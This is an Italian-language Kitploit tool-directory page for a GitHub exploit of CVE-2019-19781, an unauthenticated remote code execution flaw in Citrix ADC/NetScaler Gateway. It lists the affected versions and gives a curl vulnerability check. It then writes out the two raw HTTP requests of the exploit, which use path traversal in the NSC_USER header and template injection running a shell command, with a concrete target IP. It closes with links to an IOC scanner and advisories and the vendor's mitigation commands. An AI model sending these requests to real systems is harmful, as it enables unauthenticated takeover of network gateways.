Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mpgn/cve-2019-19781
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRisposta agli IncidentiStrumento di Accesso Remoto
GitHubmpgn/cve-2019-19781

CVE-2019-19781

CVE-2019-19781 - Exploit di esecuzione di codice remoto su Citrix ADC Netscaler

Vedi Repository
1573436 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-19781

Esecuzione remota di codice (RCE) in Citrix Application Delivery Controller e Citrix Gateway

È stata identificata una vulnerabilità in Citrix Application Delivery Controller (ADC), precedentemente noto come NetScaler ADC, e in Citrix Gateway, precedentemente noto come NetScaler Gateway, che, se sfruttata, potrebbe consentire a un attaccante non autenticato di eseguire codice arbitrario.

AGGIORNAMENTO: Scanner di indicatori di compromissione per CVE-2019-19781 di Fireeye -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

Prodotti interessati:

  • Citrix ADC e Citrix Gateway versione 13.0 tutte le build supportate
  • Citrix ADC e NetScaler Gateway versione 12.1 tutte le build supportate
  • Citrix ADC e NetScaler Gateway versione 12.0 tutte le build supportate
  • Citrix ADC e NetScaler Gateway versione 11.1 tutte le build supportate
  • Citrix NetScaler ADC e NetScaler Gateway versione 10.5 tutte le build supportate

image

Controlla se vulnerabile

root@kitploit:~
TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”

Script Perl vulnerabile

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

Exploit

Sono necessarie solo due richieste per sfruttare questa vulnerabilità senza alcuna autenticazione!

Prima richiesta:

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103

url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

Seconda richiesta:

root@kitploit:~
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

image

Analisi dettagliata (in inglese):

  • Craig Young => https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
  • @MDSecLabs => https://www.mdsec.co.uk/2020/01/deep-dive-in-to-citrix-adc-remote-code-execution-cve-2019-19781/
  • @mpgn_x64 => https://twitter.com/mpgn_x64/status/1214544993261674497

Avviso di sicurezza:

  • https://support.citrix.com/article/CTX267027

Patch (non una vera patch)

  • https://support.citrix.com/article/CTX267679
root@kitploit:~
enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config 
Scarica lo strumento